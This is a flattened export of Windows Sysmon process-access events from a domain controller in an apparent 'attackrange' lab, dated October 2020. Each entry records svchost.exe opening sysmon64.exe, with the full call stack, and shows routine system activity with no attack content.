10:40:10.406{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001590Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.406{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001589Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.406{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001588Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.404{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001587Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.404{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001586Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.404{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001585Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.404{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001584Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.404{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001583Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.404{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001582Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.403{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001581Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.403{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001580Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.403{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001579Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001578Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001577Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001576Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001575Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001574Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001573Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001572Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001571Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001570Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001569Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001568Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001567Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 